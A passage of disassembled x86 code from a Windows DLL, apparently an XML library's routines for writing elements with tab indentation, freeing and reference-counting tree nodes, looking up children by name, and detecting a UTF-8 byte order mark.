mov byte ptr [esi+ebx], 0Ah
loc_1001A39C: ; CODE XREF: sub_1001A22D+169�j
inc esi
jmp short loc_1001A3B1
; ---------------------------------------------------------------------------
loc_1001A39F: ; CODE XREF: sub_1001A22D+151�j
cmp [ebp+var_10], 0
jz short loc_1001A3B0
test ebx, ebx
jz short loc_1001A38E
mov byte ptr [esi+ebx-1], 3Eh
jmp short loc_1001A38E
; ---------------------------------------------------------------------------
loc_1001A3B0: ; CODE XREF: sub_1001A22D+176�j
dec esi
loc_1001A3B1: ; CODE XREF: sub_1001A22D+3B�j
; sub_1001A22D+170�j
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jz short loc_1001A3C9
cmp [ebp+var_C], 0
jz short loc_1001A3C6
cmp byte ptr [edi+14h], 0
jnz short loc_1001A3C6
inc eax
loc_1001A3C6: ; CODE XREF: sub_1001A22D+190�j
; sub_1001A22D+196�j
mov [ebp+var_14], eax
loc_1001A3C9: ; CODE XREF: sub_1001A22D+165�j
; sub_1001A22D+18A�j
and [ebp+var_4], 0
cmp [ebp+var_10], 0
jle loc_1001A5D2
loc_1001A3D7: ; CODE XREF: sub_1001A22D+39F�j
mov eax, [edi+2Ch]
mov ecx, [ebp+var_4]
mov eax, [eax+ecx*4]
mov ecx, eax
and ecx, 3
sub ecx, 0
jz loc_1001A59E
dec ecx
dec ecx
jz loc_1001A510
dec ecx
jnz loc_1001A5C0
mov ecx, [ebp+arg_0]
sar eax, 2
mov ecx, [ecx+24h]
lea eax, [eax+eax*2]
lea edi, [ecx+eax*4]
mov [ebp+var_8], edi
mov eax, [edi+4]
test eax, eax
jz short loc_1001A422
push eax ; Str
call strlen ; strlen
pop ecx
mov [ebp+arg_4], eax
jmp short loc_1001A426
; ---------------------------------------------------------------------------
loc_1001A422: ; CODE XREF: sub_1001A22D+1E7�j
and [ebp+arg_4], 0
loc_1001A426: ; CODE XREF: sub_1001A22D+1F3�j
cmp [ebp+arg_4], 0
jz short loc_1001A496
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jz short loc_1001A481
test ebx, ebx
jz short loc_1001A473
inc eax
lea edx, [esi+ebx]
mov ecx, eax
dec eax
test ecx, ecx
jz short loc_1001A45E
lea ecx, [eax+1]
mov edi, edx
mov edx, ecx
mov eax, 9090909h
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov edi, [ebp+var_8]
loc_1001A45E: ; CODE XREF: sub_1001A22D+214�j
mov ecx, [ebp+arg_8]
push dword ptr [edi+4] ; Source
lea eax, [esi+ebx]
lea eax, [eax+ecx+1]
push eax ; Dest
call strcpy ; strcpy
pop ecx
pop ecx
loc_1001A473: ; CODE XREF: sub_1001A22D+209�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_8]
add eax, ecx
lea esi, [esi+eax+1]
jmp short loc_1001A496
; ---------------------------------------------------------------------------
loc_1001A481: ; CODE XREF: sub_1001A22D+205�j
test ebx, ebx
jz short loc_1001A493
push dword ptr [edi+4] ; Source
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
pop ecx
pop ecx
loc_1001A493: ; CODE XREF: sub_1001A22D+256�j
add esi, [ebp+arg_4]
loc_1001A496: ; CODE XREF: sub_1001A22D+1FD�j
; sub_1001A22D+252�j
mov eax, [edi]
test eax, eax
jz short loc_1001A4A8
push eax ; Str
call strlen ; strlen
pop ecx
mov [ebp+arg_4], eax
jmp short loc_1001A4AC
; ---------------------------------------------------------------------------
loc_1001A4A8: ; CODE XREF: sub_1001A22D+26D�j
and [ebp+arg_4], 0
loc_1001A4AC: ; CODE XREF: sub_1001A22D+279�j
cmp [ebp+arg_4], 0
jz short loc_1001A4C6
test ebx, ebx
jz short loc_1001A4C3
push dword ptr [edi] ; Source
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
pop ecx
pop ecx
loc_1001A4C3: ; CODE XREF: sub_1001A22D+287�j
add esi, [ebp+arg_4]
loc_1001A4C6: ; CODE XREF: sub_1001A22D+283�j
mov eax, [edi+8]
test eax, eax
jz short loc_1001A4D9
push eax ; Str
call strlen ; strlen
pop ecx
mov [ebp+arg_4], eax
jmp short loc_1001A4DD
; ---------------------------------------------------------------------------
loc_1001A4D9: ; CODE XREF: sub_1001A22D+29E�j
and [ebp+arg_4], 0
loc_1001A4DD: ; CODE XREF: sub_1001A22D+2AA�j
cmp [ebp+arg_4], 0
jz short loc_1001A4F8
test ebx, ebx
jz short loc_1001A4F5
push dword ptr [edi+8] ; Source
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
pop ecx
pop ecx
loc_1001A4F5: ; CODE XREF: sub_1001A22D+2B8�j
add esi, [ebp+arg_4]
loc_1001A4F8: ; CODE XREF: sub_1001A22D+2B4�j
cmp [ebp+arg_8], 0FFFFFFFFh
jz loc_1001A5C0
test ebx, ebx
jz short loc_1001A50A
mov byte ptr [esi+ebx], 0Ah
loc_1001A50A: ; CODE XREF: sub_1001A22D+2D7�j
inc esi
jmp loc_1001A5C0
; ---------------------------------------------------------------------------
loc_1001A510: ; CODE XREF: sub_1001A22D+1C3�j
mov ecx, [edi+20h]
sar eax, 2
mov edi, [ecx+eax*4]
push edi
mov [ebp+var_8], edi
call sub_10018DD2
test eax, eax
pop ecx
mov [ebp+arg_4], eax
jz loc_1001A5C0
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jz short loc_1001A589
test ebx, ebx
jz short loc_1001A57E
inc eax
lea edi, [esi+ebx]
mov ecx, eax
dec eax
test ecx, ecx
jz short loc_1001A55B
lea ecx, [eax+1]
mov eax, 9090909h
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_1001A55B: ; CODE XREF: sub_1001A22D+316�j
mov edi, [ebp+arg_8]
push [ebp+var_8] ; int
lea eax, [esi+ebx]
lea eax, [eax+edi+1]
push eax ; Dest
call sub_10018D54
mov eax, [ebp+arg_4]
pop ecx
add eax, esi
pop ecx
add eax, ebx
mov byte ptr [eax+edi+1], 0Ah
mov eax, edi
loc_1001A57E: ; CODE XREF: sub_1001A22D+30B�j
mov ecx, [ebp+arg_4]
add ecx, eax
lea esi, [esi+ecx+2]
jmp short loc_1001A5C0
; ---------------------------------------------------------------------------
loc_1001A589: ; CODE XREF: sub_1001A22D+307�j
test ebx, ebx
jz short loc_1001A599
lea eax, [esi+ebx]
push edi ; int
push eax ; Dest
call sub_10018D54
pop ecx
pop ecx
loc_1001A599: ; CODE XREF: sub_1001A22D+35E�j
add esi, [ebp+arg_4]
jmp short loc_1001A5C0
; ---------------------------------------------------------------------------
loc_1001A59E: ; CODE XREF: sub_1001A22D+1BB�j
push [ebp+var_14]
mov ecx, ebx
neg ecx
lea edx, [esi+ebx]
sbb ecx, ecx
and ecx, edx
push ecx
mov ecx, [edi+1Ch]
sar eax, 2
push dword ptr [ecx+eax*4]
call sub_1001A22D
add esp, 0Ch
add esi, eax
loc_1001A5C0: ; CODE XREF: sub_1001A22D+1CA�j
; sub_1001A22D+2CF�j ...
inc [ebp+var_4]
mov edi, [ebp+arg_0]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jl loc_1001A3D7
loc_1001A5D2: ; CODE XREF: sub_1001A22D+1A4�j
mov eax, [ebp+var_C]
test eax, eax
jz loc_1001A6B9
cmp byte ptr [edi+14h], 0
jnz loc_1001A6B9
cmp [ebp+var_10], 0
jz loc_1001A679
test ebx, ebx
jz short loc_1001A663
cmp [ebp+arg_8], 0FFFFFFFFh
jz short loc_1001A622
cmp [ebp+arg_8], 0
jz short loc_1001A622
mov eax, [ebp+arg_8]
lea edi, [esi+ebx]
lea ecx, [eax]
mov eax, 9090909h
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
add esi, [ebp+arg_8]
rep stosb
mov edi, [ebp+arg_0]
loc_1001A622: ; CODE XREF: sub_1001A22D+3CC�j
; sub_1001A22D+3D2�j
lea eax, [esi+ebx]
push offset asc_100240AC ; "</"
push eax ; Dest
call strcpy ; strcpy
push dword ptr [edi] ; Source
inc esi
inc esi
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
add esi, [ebp+var_C]
add esp, 10h
cmp [ebp+arg_8], 0FFFFFFFFh
jnz short loc_1001A65C
lea eax, [esi+ebx]
push offset asc_10024030 ; ">"
push eax ; Dest
call strcpy ; strcpy
pop ecx
inc esi
pop ecx
jmp short loc_1001A6B9
; ---------------------------------------------------------------------------
loc_1001A65C: ; CODE XREF: sub_1001A22D+41A�j
push offset asc_100240A8 ; ">\n"
jmp short loc_1001A688
; ---------------------------------------------------------------------------
loc_1001A663: ; CODE XREF: sub_1001A22D+3C6�j
mov ecx, [ebp+arg_8]
cmp ecx, 0FFFFFFFFh
jz short loc_1001A673
add eax, ecx
lea esi, [esi+eax+4]
jmp short loc_1001A6B9
; ---------------------------------------------------------------------------
loc_1001A673: ; CODE XREF: sub_1001A22D+43C�j
lea esi, [esi+eax+3]
jmp short loc_1001A6B9
; ---------------------------------------------------------------------------
loc_1001A679: ; CODE XREF: sub_1001A22D+3BE�j
test ebx, ebx
jz short loc_1001A6AC
cmp [ebp+arg_8], 0FFFFFFFFh
jnz short loc_1001A697
push offset asc_100240A4 ; "/>"
loc_1001A688: ; CODE XREF: sub_1001A22D+434�j
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
pop ecx
inc esi
pop ecx
inc esi
jmp short loc_1001A6B9
; ---------------------------------------------------------------------------
loc_1001A697: ; CODE XREF: sub_1001A22D+454�j
lea eax, [esi+ebx]
push offset asc_100240A0 ; "/>\n"
push eax ; Dest
call strcpy ; strcpy
pop ecx
add esi, 3
pop ecx
jmp short loc_1001A6B9
; ---------------------------------------------------------------------------
loc_1001A6AC: ; CODE XREF: sub_1001A22D+44E�j
xor eax, eax
cmp [ebp+arg_8], 0FFFFFFFFh
setnz al
inc eax
inc eax
add esi, eax
loc_1001A6B9: ; CODE XREF: sub_1001A22D+3AA�j
; sub_1001A22D+3B4�j ...
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_1001A22D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001A6C0 proc near ; CODE XREF: sub_10018AC6+14E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, ecx
xor ecx, ecx
mov eax, [edi]
cmp eax, ecx
jnz short loc_1001A6DB
mov eax, [ebp+arg_4]
cmp eax, ecx
jz short loc_1001A6D7
mov [eax], ecx
loc_1001A6D7: ; CODE XREF: sub_1001A6C0+13�j
xor eax, eax
jmp short loc_1001A723
; ---------------------------------------------------------------------------
loc_1001A6DB: ; CODE XREF: sub_1001A6C0+C�j
cmp byte_10023EED, 0
jnz short loc_1001A6E7
mov [ebp+arg_0], ecx
loc_1001A6E7: ; CODE XREF: sub_1001A6C0+22�j
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ecx
push esi
setnz bl
dec ebx
push ebx
push ecx
push eax
call sub_1001A22D
mov esi, eax
lea eax, [esi+1]
push eax ; Size
call ds:malloc ; malloc
push ebx
push eax
push dword ptr [edi]
mov [ebp+arg_0], eax
call sub_1001A22D
mov eax, [ebp+arg_4]
add esp, 1Ch
test eax, eax
jz short loc_1001A71E
mov [eax], esi
loc_1001A71E: ; CODE XREF: sub_1001A6C0+5A�j
mov eax, [ebp+arg_0]
pop esi
pop ebx
loc_1001A723: ; CODE XREF: sub_1001A6C0+19�j
pop edi
pop ebp
retn 8
sub_1001A6C0 endp
; =============== S U B R O U T I N E =======================================
sub_1001A728 proc near ; CODE XREF: sub_1000827F+75�p
; sub_1000827F+EB�p ...
push 0
call sub_1001A79B
retn
sub_1001A728 endp
; =============== S U B R O U T I N E =======================================
sub_1001A730 proc near ; CODE XREF: sub_1001A79B+2A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
mov eax, [esi+18h]
mov ecx, [eax+1Ch]
cmp [ecx], esi
jz short loc_1001A74C
mov edx, ecx
loc_1001A744: ; CODE XREF: sub_1001A730+1A�j
add edx, 4
inc edi
cmp [edx], esi
jnz short loc_1001A744
loc_1001A74C: ; CODE XREF: sub_1001A730+10�j
dec dword ptr [eax+4]
mov eax, [esi+18h]
mov eax, [eax+4]
test eax, eax
jz short loc_1001A77B
mov edx, edi
imul edx, 3FFFFFFFh
add edx, eax
lea eax, [ecx+edi*4+4]
shl edx, 2
push edx ; Size
push eax ; Src
lea eax, [ecx+edi*4]
push eax ; Dst
call ds:memmove ; memmove
add esp, 0Ch
jmp short loc_1001A78A
; ---------------------------------------------------------------------------
loc_1001A77B: ; CODE XREF: sub_1001A730+27�j
push ecx ; Memory
call ds:free ; free
mov eax, [esi+18h]
pop ecx
and dword ptr [eax+1Ch], 0
loc_1001A78A: ; CODE XREF: sub_1001A730+49�j
push edi
push 0
push dword ptr [esi+18h]
call sub_10019167
add esp, 0Ch
pop edi
pop esi
retn
sub_1001A730 endp
; =============== S U B R O U T I N E =======================================
sub_1001A79B proc near ; CODE XREF: sub_1000A318+36C�p
; sub_1001A728+2�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, ecx
xor ebx, ebx
mov eax, [esi]
cmp eax, ebx
jz loc_1001A89D
dec dword ptr [eax+30h]
mov eax, [esi]
cmp [eax+30h], ebx
jz short loc_1001A7BF
cmp byte ptr [esp+8+arg_0], bl
jz loc_1001A89D
loc_1001A7BF: ; CODE XREF: sub_1001A79B+18�j
cmp [eax+18h], ebx
jz short loc_1001A7CB
push eax
call sub_1001A730
pop ecx
loc_1001A7CB: ; CODE XREF: sub_1001A79B+27�j
mov eax, [esi]
push ebp
push edi
xor edi, edi
cmp [eax+4], ebx
jle short loc_1001A7FC
loc_1001A7D6: ; CODE XREF: sub_1001A79B+5F�j
mov eax, [eax+1Ch]
mov edx, edi
shl edx, 2
push [esp+10h+arg_0]
mov eax, [eax+edx]
mov [eax+18h], ebx
mov eax, [esi]
mov ecx, [eax+1Ch]
add ecx, edx
call sub_1001A79B
mov eax, [esi]
inc edi
cmp edi, [eax+4]
jl short loc_1001A7D6
loc_1001A7FC: ; CODE XREF: sub_1001A79B+39�j
mov eax, [esi]
mov edi, ds:free
push dword ptr [eax+1Ch] ; Memory
call edi ; free
mov eax, [esi]
xor ebp, ebp
pop ecx
cmp [eax+8], ebx
jle short loc_1001A824
loc_1001A813: ; CODE XREF: sub_1001A79B+87�j
mov eax, [eax+20h]
push dword ptr [eax+ebp*4] ; Memory
call edi ; free
mov eax, [esi]
inc ebp
pop ecx
cmp ebp, [eax+8]
jl short loc_1001A813
loc_1001A824: ; CODE XREF: sub_1001A79B+76�j
mov eax, [esi]
push dword ptr [eax+20h] ; Memory
call edi ; free
mov eax, [esi]
xor ebp, ebp
pop ecx
cmp [eax+0Ch], ebx
jle short loc_1001A84B
loc_1001A835: ; CODE XREF: sub_1001A79B+AC�j
mov eax, [eax+24h]
push dword ptr [eax+ebx] ; Memory
call edi ; free
mov eax, [esi]
inc ebp
add ebx, 0Ch
pop ecx
cmp ebp, [eax+0Ch]
jl short loc_1001A835
xor ebx, ebx
loc_1001A84B: ; CODE XREF: sub_1001A79B+98�j
mov eax, [esi]
push dword ptr [eax+24h] ; Memory
call edi ; free
mov eax, [esi]
xor ebp, ebp
pop ecx
cmp [eax+10h], ebx
jle short loc_1001A87E
loc_1001A85C: ; CODE XREF: sub_1001A79B+E1�j
mov eax, [eax+28h]
push dword ptr [eax+ebp*8] ; Memory
call edi ; free
mov eax, [esi]
pop ecx
mov eax, [eax+28h]
mov eax, [eax+ebp*8+4]
cmp eax, ebx
jz short loc_1001A876
push eax ; Memory
call edi ; free
pop ecx
loc_1001A876: ; CODE XREF: sub_1001A79B+D5�j
mov eax, [esi]
inc ebp
cmp ebp, [eax+10h]
jl short loc_1001A85C
loc_1001A87E: ; CODE XREF: sub_1001A79B+BF�j
mov eax, [esi]
push dword ptr [eax+28h] ; Memory
call edi ; free
mov eax, [esi]
push dword ptr [eax+2Ch] ; Memory
call edi ; free
mov eax, [esi]
push dword ptr [eax] ; Memory
call edi ; free
push dword ptr [esi] ; Memory
call edi ; free
add esp, 10h
mov [esi], ebx
pop edi
pop ebp
loc_1001A89D: ; CODE XREF: sub_1001A79B+A�j
; sub_1001A79B+1E�j
pop esi
pop ebx
retn 4
sub_1001A79B endp
; =============== S U B R O U T I N E =======================================
sub_1001A8A2 proc near ; CODE XREF: sub_1000878F+D7�p
; sub_1000878F+12E�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp esi, edi
jz short loc_1001A8C0
push 0
call sub_1001A79B
mov eax, [edi]
test eax, eax
mov [esi], eax
jz short loc_1001A8C0
inc dword ptr [eax+30h]
loc_1001A8C0: ; CODE XREF: sub_1001A8A2+A�j
; sub_1001A8A2+19�j
mov eax, esi
pop edi
pop esi
retn 4
sub_1001A8A2 endp
; =============== S U B R O U T I N E =======================================
sub_1001A8C7 proc near ; CODE XREF: sub_1000878F+1CD�p
; sub_1000878F+2D2�p ...
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov edx, [ecx]
test edx, edx
mov [eax], edx
jz short locret_1001A8D8
inc dword ptr [edx+30h]
locret_1001A8D8: ; CODE XREF: sub_1001A8C7+C�j
retn 4
sub_1001A8C7 endp
; =============== S U B R O U T I N E =======================================
sub_1001A8DB proc near ; CODE XREF: sub_1000878F+14A�p
; sub_1000878F+250�p ...
arg_0 = dword ptr 4
mov eax, [ecx]
test eax, eax
jz short locret_1001A913
mov ecx, [eax+4]
push esi
mov esi, [eax+1Ch]
push edi
xor edi, edi
test ecx, ecx
jle short loc_1001A90F
push ebx
mov ebx, ecx
loc_1001A8F2: ; CODE XREF: sub_1001A8DB+31�j
mov eax, [esi]
push [esp+0Ch+arg_0]
mov eax, [eax]
push eax
call ds:_mbsicmp ; _mbsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_1001A908
inc edi
loc_1001A908: ; CODE XREF: sub_1001A8DB+2A�j
add esi, 4
dec ebx
jnz short loc_1001A8F2
pop ebx
loc_1001A90F: ; CODE XREF: sub_1001A8DB+12�j
mov eax, edi
pop edi
pop esi
locret_1001A913: ; CODE XREF: sub_1001A8DB+4�j
retn 4
sub_1001A8DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001A916 proc near ; CODE XREF: sub_1000827F+25A�p
; sub_1000827F+310�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ecx]
push ebx
push esi
xor esi, esi
cmp eax, esi
push edi
mov [ebp+var_4], esi
jz short loc_1001A965
mov ecx, [ebp+arg_8]
mov ebx, [eax+4]
cmp ecx, esi
jz short loc_1001A934
mov esi, [ecx]
loc_1001A934: ; CODE XREF: sub_1001A916+1A�j
mov eax, [eax+1Ch]
lea edi, [eax+esi*4]
loc_1001A93A: ; CODE XREF: sub_1001A916+40�j
cmp esi, ebx
jge short loc_1001A965
mov eax, [edi]
push [ebp+arg_4]
mov eax, [eax]
push eax
call ds:_mbsicmp ; _mbsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_1001A958
add edi, 4
inc esi
jmp short loc_1001A93A
; ---------------------------------------------------------------------------
loc_1001A958: ; CODE XREF: sub_1001A916+3A�j
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_1001A962
inc esi
mov [eax], esi
loc_1001A962: ; CODE XREF: sub_1001A916+47�j
push edi
jmp short loc_1001A96A
; ---------------------------------------------------------------------------
loc_1001A965: ; CODE XREF: sub_1001A916+10�j
; sub_1001A916+26�j
push offset dword_10073FF0
loc_1001A96A: ; CODE XREF: sub_1001A916+4D�j
mov ecx, [ebp+arg_0]
call sub_1001A8C7
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_1001A916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001A97C proc near ; CODE XREF: sub_1000827F+4A�p
; sub_1000827F+B9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push edi
mov edi, ecx
xor eax, eax
cmp [edi], eax
mov [ebp+var_4], eax
jnz short loc_1001A99B
mov ecx, [ebp+arg_0]
push offset dword_10073FF0
call sub_1001A8C7
jmp short loc_1001A9DB
; ---------------------------------------------------------------------------
loc_1001A99B: ; CODE XREF: sub_1001A97C+E�j
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, eax
dec eax
test ecx, ecx
jle short loc_1001A9CA
push esi
lea esi, [eax+1]
loc_1001A9AC: ; CODE XREF: sub_1001A97C+4B�j
lea eax, [ebp+var_4]
mov ecx, edi
push eax
lea eax, [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_1001A916
lea ecx, [ebp+arg_8]
call sub_1001A728
dec esi
jnz short loc_1001A9AC
pop esi
loc_1001A9CA: ; CODE XREF: sub_1001A97C+2A�j
lea eax, [ebp+var_4]
mov ecx, edi
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_1001A916
loc_1001A9DB: ; CODE XREF: sub_1001A97C+1D�j
mov eax, [ebp+arg_0]
pop edi
leave
retn 0Ch
sub_1001A97C endp
; =============== S U B R O U T I N E =======================================
sub_1001A9E3 proc near ; CODE XREF: sub_1000A318+25A�p
; sub_1000A318+2B8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [ecx]
push ebx
push esi
push edi
test eax, eax
jz short loc_1001AA2E
mov ecx, [esp+0Ch+arg_4]
mov ebx, [eax+10h]
xor esi, esi
test ecx, ecx
jz short loc_1001A9FB
mov esi, [ecx]
loc_1001A9FB: ; CODE XREF: sub_1001A9E3+14�j
mov eax, [eax+28h]
lea edi, [eax+esi*8]
loc_1001AA01: ; CODE XREF: sub_1001A9E3+39�j
cmp esi, ebx
jge short loc_1001AA2E
push [esp+0Ch+arg_0]
mov eax, [edi]
push eax
call ds:_mbsicmp ; _mbsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_1001AA1E
add edi, 8
inc esi
jmp short loc_1001AA01
; ---------------------------------------------------------------------------
loc_1001AA1E: ; CODE XREF: sub_1001A9E3+33�j
mov eax, [esp+0Ch+arg_4]
test eax, eax
jz short loc_1001AA29
inc esi
mov [eax], esi
loc_1001AA29: ; CODE XREF: sub_1001A9E3+41�j
mov eax, [edi+4]
jmp short loc_1001AA30
; ---------------------------------------------------------------------------
loc_1001AA2E: ; CODE XREF: sub_1001A9E3+7�j
; sub_1001A9E3+20�j
xor eax, eax
loc_1001AA30: ; CODE XREF: sub_1001A9E3+49�j
pop edi
pop esi
pop ebx
retn 8
sub_1001A9E3 endp
; =============== S U B R O U T I N E =======================================
sub_1001AA36 proc near ; CODE XREF: sub_10019DAA+DD�p
; sub_10019DAA+10D�p ...
mov eax, [ecx]
test eax, eax
jnz short loc_1001AA3D
retn
; ---------------------------------------------------------------------------
loc_1001AA3D: ; CODE XREF: sub_1001AA36+4�j
mov eax, [eax]
retn
sub_1001AA36 endp
; =============== S U B R O U T I N E =======================================
sub_1001AA40 proc near ; CODE XREF: sub_10019DAA+85�p
; sub_10019DAA+12E�p ...
mov eax, [ecx]
test eax, eax
jnz short loc_1001AA47
retn
; ---------------------------------------------------------------------------
loc_1001AA47: ; CODE XREF: sub_1001AA40+4�j
mov eax, [eax+4]
retn
sub_1001AA40 endp
; =============== S U B R O U T I N E =======================================
sub_1001AA4B proc near ; CODE XREF: sub_10019DAA+91�p
mov ecx, [ecx]
test ecx, ecx
jnz short loc_1001AA54
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_1001AA54: ; CODE XREF: sub_1001AA4B+4�j
mov eax, [ecx+10h]
add eax, [ecx+0Ch]
add eax, [ecx+8]
add eax, [ecx+4]
retn
sub_1001AA4B endp
; =============== S U B R O U T I N E =======================================
sub_1001AA61 proc near ; CODE XREF: sub_1000827F+150�p
; sub_1000827F+1D1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [ecx]
push esi
test ecx, ecx
push edi
jz short loc_1001AA7D
mov eax, [esp+8+arg_4]
cmp eax, [ecx+0Ch]
jge short loc_1001AA7D
mov ecx, [ecx+24h]
lea eax, [eax+eax*2]
lea esi, [ecx+eax*4]
jmp short loc_1001AA82
; ---------------------------------------------------------------------------
loc_1001AA7D: ; CODE XREF: sub_1001AA61+6�j
; sub_1001AA61+F�j
mov esi, offset dword_10073FF8
loc_1001AA82: ; CODE XREF: sub_1001AA61+1A�j
mov eax, [esp+8+arg_0]
mov edi, eax
movsd
movsd
movsd
pop edi
pop esi
retn 8
sub_1001AA61 endp
; =============== S U B R O U T I N E =======================================
sub_1001AA90 proc near ; CODE XREF: sub_1000827F+5F�p
; sub_1000827F+D4�p ...
arg_0 = dword ptr 4
mov eax, [ecx]
test eax, eax
jz short loc_1001AAA7
mov ecx, [esp+arg_0]
cmp ecx, [eax+8]
jge short loc_1001AAA7
mov eax, [eax+20h]
mov eax, [eax+ecx*4]
jmp short locret_1001AAA9
; ---------------------------------------------------------------------------
loc_1001AAA7: ; CODE XREF: sub_1001AA90+4�j
; sub_1001AA90+D�j
xor eax, eax
locret_1001AAA9: ; CODE XREF: sub_1001AA90+15�j
retn 4
sub_1001AA90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001AAAC proc near ; CODE XREF: sub_10018AC6+79�p
; sub_10019DAA+A2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ecx]
and [ebp+var_4], 0
test eax, eax
jz short loc_1001AACB
mov ecx, [ebp+arg_4]
cmp ecx, [eax+4]
jge short loc_1001AACB
mov eax, [eax+1Ch]
lea eax, [eax+ecx*4]
push eax
jmp short loc_1001AAD0
; ---------------------------------------------------------------------------
loc_1001AACB: ; CODE XREF: sub_1001AAAC+C�j
; sub_1001AAAC+14�j
push offset dword_10073FF0
loc_1001AAD0: ; CODE XREF: sub_1001AAAC+1D�j
mov ecx, [ebp+arg_0]
call sub_1001A8C7
mov eax, [ebp+arg_0]
leave
retn 8
sub_1001AAAC endp
; =============== S U B R O U T I N E =======================================
sub_1001AADF proc near ; CODE XREF: sub_10018AC6+59�p
; sub_10018AC6+83�p ...
mov eax, [ecx]
test eax, eax
jnz short loc_1001AAE8
xor al, al
retn
; ---------------------------------------------------------------------------
loc_1001AAE8: ; CODE XREF: sub_1001AADF+4�j
mov al, [eax+14h]
retn
sub_1001AADF endp
; =============== S U B R O U T I N E =======================================
sub_1001AAEC proc near ; CODE XREF: sub_10019709+131�p
xor eax, eax
cmp [ecx], eax
setz al
retn
sub_1001AAEC endp
; =============== S U B R O U T I N E =======================================
sub_1001AAF4 proc near ; CODE XREF: sub_100189B8+BA�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = byte ptr 0Ch
mov al, [esp+arg_4]
mov byte_10023EEC, al
mov al, [esp+arg_8]
mov byte_10023EED, al
mov eax, [esp+arg_0]
dec eax
jz short loc_1001AB42
dec eax
jz short loc_1001AB2C
dec eax
jz short loc_1001AB16
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_1001AB16: ; CODE XREF: sub_1001AAF4+1D�j
mov Count, 3
mov off_10023F80, offset dword_1001F938
jmp short loc_1001AB56
; ---------------------------------------------------------------------------
loc_1001AB2C: ; CODE XREF: sub_1001AAF4+1A�j
mov Count, 2
mov off_10023F80, offset dword_1001F838
jmp short loc_1001AB56
; ---------------------------------------------------------------------------
loc_1001AB42: ; CODE XREF: sub_1001AAF4+17�j
mov Count, 1
mov off_10023F80, offset byte_1001F738
loc_1001AB56: ; CODE XREF: sub_1001AAF4+36�j
; sub_1001AAF4+4C�j
xor al, al
retn
sub_1001AAF4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001AB59(void *lpv, size_t iSize, char)
sub_1001AB59 proc near ; CODE XREF: sub_100189B8+B1�p
Dst = byte ptr -0CCh
lpv = dword ptr 4
iSize = dword ptr 8
arg_8 = byte ptr 0Ch
sub esp, 0CCh
push ebx
push ebp
push esi
mov esi, [esp+0D8h+iSize]
cmp esi, 19h
push edi
jge short loc_1001AB76
loc_1001AB6F: ; CODE XREF: sub_1001AB59+39�j
xor eax, eax
jmp loc_1001AD1D
; ---------------------------------------------------------------------------
loc_1001AB76: ; CODE XREF: sub_1001AB59+14�j
mov edi, [esp+0DCh+lpv]
xor ebx, ebx
cmp byte_10023EEC, bl
jz short loc_1001AB94
push esi ; iSize
push edi ; lpv
call sub_10018943
pop ecx
test al, al
pop ecx
jnz short loc_1001AB6F
loc_1001AB94: ; CODE XREF: sub_1001AB59+2C�j
cmp byte ptr [edi], 0EFh
jnz short loc_1001ABAD
cmp byte ptr [edi+1], 0BBh
jnz short loc_1001ABAD
cmp byte ptr [edi+2], 0BFh
jnz short loc_1001ABAD
push 1
loc_1001ABA7: ; CODE XREF: sub_1001AB59+1B0�j
; sub_1001AB59+1B7�j
pop eax
jmp loc_1001AD1D
; ---------------------------------------------------------------------------
loc_1001ABAD: ; CODE XREF: sub_1001AB59+3E�j
; sub_1001AB59+44�j ...
push 1
xor eax, eax
cmp esi, ebx
pop ebp
jle short loc_1001AC19
loc_1001ABB6: ; CODE XREF: sub_1001AB59+BE�j
movzx ecx, byte ptr [eax+edi]
movsx ecx, ds:byte_1001F738[ecx]
sub ecx, ebx
